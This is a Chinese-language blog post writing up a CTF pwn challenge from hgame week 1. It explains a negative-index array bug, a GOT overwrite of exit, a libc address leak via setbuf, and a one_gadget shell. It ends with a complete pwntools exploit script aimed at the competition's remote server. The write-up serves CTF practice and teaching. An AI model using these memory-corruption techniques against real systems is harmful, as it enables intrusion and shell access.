<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="index, follow"><title>hgame_week1 • StarrySky</title><meta name="description" content="hgame_week1 - StarrySky"><link rel="icon" href="/favicon.svg"><link rel="stylesheet" href="https://unpkg.com/nanoreset@3.0.1/nanoreset.min.css"><link rel="stylesheet" href="/css/theme.css"><link rel="search" type="application/opensearchdescription+xml" href="/atom.xml" title="StarrySky"><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="StarrySky" type="application/atom+xml">
</head><body><div class="wrap" id="barba-wrapper"><header><h1 class="branding"><a href="/" title="StarrySky"><img class="logo-image" src="/logo.svg" alt="logo"></a></h1><ul class="nav nav-list"><li class="nav-list-item"><a class="nav-list-link no-barba" href="/" target="_self">HOME</a></li><li class="nav-list-item"><a class="nav-list-link no-barba" href="/about" target="_self">ABOUT</a></li><li class="nav-list-item"><a class="nav-list-link no-barba" href="/archives" target="_self">ARCHIVES</a></li><li class="nav-list-item"></ul></header><div class="barba-container"><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">hgame_week1</h1><div class="post-info"><a></a>2023-01-12</div><div class="post-content"><p><strong>检查保护</strong></p>
<p><img src="/.com//hgame-week1%5C2.png" alt="2"></p>
<p><strong>IDA反汇编</strong></p>
<p><img src="/.com//hgame-week1%5C7.png" alt="7"></p>
<p><img src="/.com//hgame-week1%5C6.png" alt="6"></p>
<p><strong>HINTS</strong></p>
<p><img src="/.com//hgame-week1%5C1.png" alt="1"></p>
<p><strong>分析：</strong></p>
<p><img src="/.com//hgame-week1%5C12.png" alt="12"></p>
<p>读入v0作为数组下标，仅判断大于9的情况，而对小于0时未做限制，因此可以利用数组向上覆盖任意地址内容或定位到任意地址来泄露地址</p>
<p><img src="/.com//hgame-week1%5C14.png" alt="14"></p>
<p>vuln函数最后exit（0）结束程序导致不能二次利用，所以第一步先将exit_got覆盖成vuln_addr使程序可以被二次利用</p>
<p><img src="/.com//hgame-week1%5C13.png" alt="13"></p>
<p>由于使用的下标是16*v0，则计算v0：（所求地址-seats地址）&#x2F;16</p>
<pre><code class="python">#将exit覆盖成vuln
index1 = (exit - seat) / 16
r.sendlineafter(&#39;Here is the seat from 0 to 9, please choose one.&#39; , str(int(index1)))
r.sendlineafter(&#39;please input your name\n&#39; , p64(vuln))
</code></pre>
<p>此时可以不断利用vuln函数</p>
<p>linux自带ASLR地址随机化每次程序运行时函数地址都不同， 但是由于函数与libc之间的相对距离不变，所以可以间接通过泄露函数地址求libc地址</p>
<p><img src="/.com//hgame-week1%5C11.png" alt="11"></p>
<p>为了不影响程序的正常运行，这里选择泄露位于main函数中不会再被用到的setbuf</p>
<pre><code class="python">index2 = (setbuf - seat) / 16
r.sendlineafter(&#39;Here is the seat from 0 to 9, please choose one.&#39; , str(int(index2)))
r.sendlineafter(&#39;please input your name&#39; , &#39;&#39;)

leak_addr = u64(r.recvuntil(&#39;\x7f&#39;)[-6:].ljust(8,b&#39;\x00&#39;))
li(&#39;leak_addr = &#39; + hex(leak_addr))
</code></pre>
<p>调试计算setbuf到libc的相对距离</p>
<p><img src="/.com//hgame-week1%5C15.png" alt="15"></p>
<p><img src="/.com//hgame-week1%5C9.png" alt="9"></p>
<p>接下来就可以用泄露的setbuf地址和相对位置计算libc地址</p>
<pre><code class="python">#leak_addr - libc = 0x8ba0a
libc_base = leak_addr - 0x8ba0a
</code></pre>
<p>接下来就是利用one_gadget来getshell了，还是选择exit位置将其覆盖成one_gadget，这样程序运行到结束就可以getshell了</p>
<p><img src="/.com//hgame-week1%5C4.png" alt="4"></p>
<p><strong>完整exp如下</strong></p>
<pre><code class="python">from pwn import *

context(arch=&#39;amd64&#39;, os=&#39;linux&#39;, log_level=&#39;debug&#39;)

file_name = &#39;./vuln&#39;

li = lambda x : print(&#39;\x1b[01;38;5;214m&#39; + x + &#39;\x1b[0m&#39;)
ll = lambda x : print(&#39;\x1b[01;38;5;1m&#39; + x + &#39;\x1b[0m&#39;)

context.terminal = [&#39;tmux&#39;,&#39;splitw&#39;,&#39;-h&#39;]

debug = 1
if debug:
    r = remote(&#39;week-1.hgame.lwsec.cn&#39;,31205)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

seat = 0x4040A0
exit = 0x404040
vuln = 0x4011D6
setbuf = 0x404020

index1 = (exit - seat) / 16
r.sendlineafter(&#39;Here is the seat from 0 to 9, please choose one.&#39; , str(int(index1)))
r.sendlineafter(&#39;please input your name\n&#39; , p64(vuln))

index2 = (setbuf - seat) / 16
r.sendlineafter(&#39;Here is the seat from 0 to 9, please choose one.&#39; , str(int(index2)))
r.sendlineafter(&#39;please input your name&#39; , &#39;&#39;)

leak_addr = u64(r.recvuntil(&#39;\x7f&#39;)[-6:].ljust(8,b&#39;\x00&#39;))
li(&#39;leak_addr = &#39; + hex(leak_addr))

#leak_addr - libc = 0x8ba0a
libc_base = leak_addr - 0x8ba0a
                                                                                                                      

one = [0xe3afe , 0xe3b01 , 0xe3b04]
one_gadget = one[1] + libc_base

r.sendlineafter(&#39;Here is the seat from 0 to 9, please choose one.&#39; , str(int(index1)))
r.sendlineafter(&#39;please input your name&#39; , p64(one_gadget))

r.interactive()
</code></pre>
</div></article></div></main><footer><div class="paginator"><a class="next" href="/2023/01/05/hello-world/">next</a></div><div class="copyright"><p>&copy; 2023 <a href="http://example.com">StarrySky</a><br>Powered by <a href="https://hexo.io/" rel="noreferrer" target="_blank">Hexo</a></p></div></footer></div></div><script src="https://cdnjs.cloudflare.com/ajax/libs/barba.js/1.0.0/barba.min.js"></script><script>document.addEventListener('DOMContentLoaded', function() {
    Barba.Pjax.start()
})</script></body></html>